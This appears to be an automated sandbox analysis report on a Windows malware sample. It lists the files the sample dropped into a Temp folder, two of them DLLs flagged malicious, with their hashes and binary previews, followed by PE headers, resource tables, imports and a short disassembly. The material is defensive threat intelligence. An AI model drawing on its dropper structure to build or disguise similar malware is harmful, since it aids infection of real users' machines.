                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1063
                                                                                                                                                                                                                            Entropy (8bit):4.989393224874837
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:85XmCQsfRNgKsdC/rb0yAoZf1Xx2gxbqyFm:84CQoR0RoBd/YyF
                                                                                                                                                                                                                            MD5:3DB416DE63CA1B9FFA332807450F6289
                                                                                                                                                                                                                            SHA1:7FC21AA109A6444BD24A560E9FEB57DB82159CB1
                                                                                                                                                                                                                            SHA-256:8B99A8E9127360C4935CA81632584629FA0C364B56377753735A3CF30D83D5A7
                                                                                                                                                                                                                            SHA-512:503849FB88DE4560F5F02296C086EB436BD5E0D19C73D0CFEC3CE55CC6041FB2171C0C77AD3E567B9735A190EC500D29981D679D0E993B4A28B60FFF604AE2C1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:L..................F.... ....Z.!......g.....Z.!....0.%.......................:..DG..Yr?.D..U..k0.&...&......vk.v.....jz....:.\........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Xy8...........................%..A.p.p.D.a.t.a...B.P.1......Xw8..Local.<......CW.^.Xy8....b.....................VJ..L.o.c.a.l.....N.1......X.8..Temp..:......CW.^.X.8....l......................D .T.e.m.p.....T.1......X.8..u42w.2..>......X.8.X.8....D.........................u.4.2.w...2.....V.2.0.%..X./ .run.exe.@......X./.X.8.............................r.u.n...e.x.e......._...............-.......^.............FX.....C:\Users\user\AppData\Local\Temp\u42w.2\run.exe......\.u.4.2.w...2.\.r.u.n...e.x.e.........|....I.J.H..K..:...`.......X.......813848...........hT..CrF.f4... .7.T..b...,.......hT..CrF.f4... .7.T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9.
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1640960
                                                                                                                                                                                                                            Entropy (8bit):6.484662993855079
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                                                                                            MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                                                                                            SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                                                                                            SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                                                                                            SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1329417
                                                                                                                                                                                                                            Entropy (8bit):7.898171122766659
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
                                                                                                                                                                                                                            MD5:1E8237D3028AB52821D69099E0954F97
                                                                                                                                                                                                                            SHA1:30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
                                                                                                                                                                                                                            SHA-256:9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
                                                                                                                                                                                                                            SHA-512:A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1596416
                                                                                                                                                                                                                            Entropy (8bit):6.46619614175955
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                                                                                            MD5:10D51BECD0BBCE0FAB147FF9658C565E
                                                                                                                                                                                                                            SHA1:4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
                                                                                                                                                                                                                            SHA-256:7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
                                                                                                                                                                                                                            SHA-512:29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):87278
                                                                                                                                                                                                                            Entropy (8bit):4.38402884518968
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
                                                                                                                                                                                                                            MD5:A723BF46048E0BFB15B8D77D7A648C3E
                                                                                                                                                                                                                            SHA1:8952D3C34E9341E4425571E10F22B782695BB915
                                                                                                                                                                                                                            SHA-256:B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
                                                                                                                                                                                                                            SHA-512:CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                                            Entropy (8bit):4.468192974508052
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:VIXfpi67eLPU9skLmb0b4iWSPKaJG8nAgejZMMhA2gX4WABl0uNKdwBCswSbk:WXD94iWlLZMM6YFHI+k
                                                                                                                                                                                                                            MD5:4FFD0F78FBC25FACEA090D464AB9A8E7
                                                                                                                                                                                                                            SHA1:0BB114037E3D288D0CC90327FA933F3BEE53F565
                                                                                                                                                                                                                            SHA-256:738020363E1950ED1E737448D30A5E87231DAFACAE94AB5B2F4FE1C5135E281F
                                                                                                                                                                                                                            SHA-512:368CD6D8696566AEA599E6F803B1462DEAE7CD34D77B0F9E930C669E8622D4CD535C4B3810302098E5838388DB4624DB8ABF721E6763C7A89F94377F827F071C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.C.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):6.705713853556455
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                            File name:g77dRQ1Csm.exe
                                                                                                                                                                                                                            File size:425'985 bytes
                                                                                                                                                                                                                            MD5:41de8e3e7412b6e97b60fdbfdd24b0ba
                                                                                                                                                                                                                            SHA1:fa48e5a86b5f2b04b79f6c3459339a16c2db6aaa
                                                                                                                                                                                                                            SHA256:480b540cb344d74306d03347658b2018a4b8504f4055ad15ba43456953d7b33c
                                                                                                                                                                                                                            SHA512:d25d39fcbbc59677f4090ac5422c121d45c2085bfdb16adb7f8854a365636ac7baf42f74ccb435e11b1c355c83c28d80bfb58d8495e0d5ab2f59f3987390a1d5
                                                                                                                                                                                                                            SSDEEP:12288:BFc5MyBQNGCCIYu7GJ9QICQfEHVmJspao:BOdWNYIx7W90uEao
                                                                                                                                                                                                                            TLSH:D694F112B6ACDCF6D7A74A705C25CB94593FBDA01E63D1CB331C1BAE2D30290A725762
                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............X...X...X..SX...X..EX...X..BX...X.).X...X...X...X..LX...X..RX...X..WX...XRich...X........PE..L......c...................
                                                                                                                                                                                                                            Icon Hash:67276767d3771667
                                                                                                                                                                                                                            Entrypoint:0x40164c
                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                            Time Stamp:0x63B0F485 [Sun Jan 1 02:48:37 2023 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                            Import Hash:954261c9cff65161a03be3d46077b75e
                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                            call 00007F2940502BF4h
                                                                                                                                                                                                                            jmp 00007F29404FEECDh
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                            test ecx, 00000003h
                                                                                                                                                                                                                            je 00007F29404FF076h
                                                                                                                                                                                                                            mov al, byte ptr [ecx]
                                                                                                                                                                                                                            add ecx, 01h
                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                            je 00007F29404FF0A0h
                                                                                                                                                                                                                            test ecx, 00000003h
                                                                                                                                                                                                                            jne 00007F29404FF041h
                                                                                                                                                                                                                            add eax, 00000000h
                                                                                                                                                                                                                            lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                                                                            lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                                                                            mov eax, dword ptr [ecx]
                                                                                                                                                                                                                            mov edx, 7EFEFEFFh
                                                                                                                                                                                                                            add edx, eax
                                                                                                                                                                                                                            xor eax, FFFFFFFFh
                                                                                                                                                                                                                            xor eax, edx
                                                                                                                                                                                                                            add ecx, 04h
                                                                                                                                                                                                                            test eax, 81010100h
                                                                                                                                                                                                                            je 00007F29404FF03Ah
                                                                                                                                                                                                                            mov eax, dword ptr [ecx-04h]
                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                            je 00007F29404FF084h
                                                                                                                                                                                                                            test ah, ah
                                                                                                                                                                                                                            je 00007F29404FF076h
                                                                                                                                                                                                                            test eax, 00FF0000h
                                                                                                                                                                                                                            je 00007F29404FF065h
                                                                                                                                                                                                                            test eax, FF000000h
                                                                                                                                                                                                                            je 00007F29404FF054h
                                                                                                                                                                                                                            jmp 00007F29404FF01Fh
                                                                                                                                                                                                                            lea eax, dword ptr [ecx-01h]
                                                                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                            sub eax, ecx
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            lea eax, dword ptr [ecx-02h]
                                                                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                            sub eax, ecx
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            lea eax, dword ptr [ecx-03h]
                                                                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                            sub eax, ecx
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            lea eax, dword ptr [ecx-04h]
                                                                                                                                                                                                                            mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                            sub eax, ecx
                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                            mov edi, edi
                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                            sub esp, 20h
                                                                                                                                                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                            push edi
                                                                                                                                                                                                                            push 00000008h
                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                            mov esi, 0040C1F4h
                                                                                                                                                                                                                            lea edi, dword ptr [ebp-20h]
                                                                                                                                                                                                                            rep movsd
                                                                                                                                                                                                                            mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                                            mov eax, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                            pop edi
                                                                                                                                                                                                                            mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                            pop esi
                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                            je 00007F29404FF05Eh
                                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                                            • [ASM] VS2008 build 21022
                                                                                                                                                                                                                            • [ C ] VS2008 build 21022
                                                                                                                                                                                                                            • [C++] VS2008 build 21022
                                                                                                                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                                                                                                                            • [RES] VS2008 build 21022
                                                                                                                                                                                                                            • [LNK] VS2008 build 21022
                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x57e0c0x3c.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x283c0000xe2e9.rsrc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x576800x40.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xc0000x178.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                            .text0x10000xa6b30xa800c5de43341ea98e3f6c737a98c1bc812eFalse0.6148158482142857data6.560225096958423IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rdata0xc0000x4c69c0x4c800b8a9b363e9f444f47ead7d0b669cc15cFalse0.751318040236928data6.846333541367442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .data0x590000x27e22c80x280042ff89a79cc3f22597e9688745a6781cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .rsrc0x283c0000xe2e90xe4007f09e603b35d4759918a2017341a18a9False0.49705317982456143data5.286359544961133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                            LAKUTIMIREXUKELIY0x283c6ac0x476ASCII text, with very long lines (1142), with no line terminatorsTurkishTurkey0.6260945709281961
                                                                                                                                                                                                                            RT_CURSOR0x283cb240x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                                                                                                                                                                                            RT_ICON0x283cc540xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.42937100213219614
                                                                                                                                                                                                                            RT_ICON0x283dafc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5681407942238267
                                                                                                                                                                                                                            RT_ICON0x283e3a40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6353686635944701
                                                                                                                                                                                                                            RT_ICON0x283ea6c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6799132947976878
                                                                                                                                                                                                                            RT_ICON0x283efd40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.5195020746887967
                                                                                                                                                                                                                            RT_ICON0x284157c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.5905737704918033
                                                                                                                                                                                                                            RT_ICON0x2841f040x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.6143617021276596
                                                                                                                                                                                                                            RT_ICON0x284236c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.43763326226012794
                                                                                                                                                                                                                            RT_ICON0x28432140x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.5627256317689531
                                                                                                                                                                                                                            RT_ICON0x2843abc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6071428571428571
                                                                                                                                                                                                                            RT_ICON0x28441840x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.6596820809248555
                                                                                                                                                                                                                            RT_ICON0x28446ec0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.3865145228215768
                                                                                                                                                                                                                            RT_ICON0x2846c940x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.4111163227016886
                                                                                                                                                                                                                            RT_ICON0x2847d3c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.43975409836065577
                                                                                                                                                                                                                            RT_ICON0x28486c40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.44060283687943264
                                                                                                                                                                                                                            RT_STRING0x2848b2c0xd2data0.5523809523809524
                                                                                                                                                                                                                            RT_STRING0x2848c000x552data0.44419970631424377
                                                                                                                                                                                                                            RT_STRING0x28491540xf8data0.5564516129032258
                                                                                                                                                                                                                            RT_STRING0x284924c0x7dcdata0.4150099403578529
                                                                                                                                                                                                                            RT_STRING0x2849a280x15cdata0.5229885057471264
                                                                                                                                                                                                                            RT_STRING0x2849b840xdcdata0.55
                                                                                                                                                                                                                            RT_STRING0x2849c600x12adata0.5167785234899329
                                                                                                                                                                                                                            RT_ACCELERATOR0x2849d8c0x28data1.0
                                                                                                                                                                                                                            RT_GROUP_CURSOR0x2849db40x14data1.15
                                                                                                                                                                                                                            RT_GROUP_ICON0x2849dc80x68dataTurkishTurkey0.7115384615384616
                                                                                                                                                                                                                            RT_GROUP_ICON0x2849e300x76dataTurkishTurkey0.6779661016949152
                                                                                                                                                                                                                            RT_VERSION0x2849ea80x1e0data0.5645833333333333
                                                                                                                                                                                                                            RT_MANIFEST0x284a0880x261XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (549), with CRLF line terminators0.5451559934318555
                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                            KERNEL32.dllGetConsoleAliasExesLengthA, GetCommState, GetModuleHandleW, GetProcessHeap, GetDateFormatA, GlobalAlloc, LoadLibraryW, HeapDestroy, IsBadWritePtr, GetModuleFileNameW, GlobalUnfix, GetProcAddress, SetFirmwareEnvironmentVariableW, GetLocaleInfoA, GetFileType, SetConsoleDisplayMode, SetCurrentDirectoryW, WaitForMultipleObjects, SetConsoleTitleW, FreeEnvironmentStringsW, BuildCommDCBA, VirtualProtect, GetCurrentDirectoryA, FindAtomW, FileTimeToLocalFileTime, SetFileAttributesW, GetVolumeInformationW, LoadLibraryA, EnumCalendarInfoA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, FlushFileBuffers, CreateFileA, CloseHandle
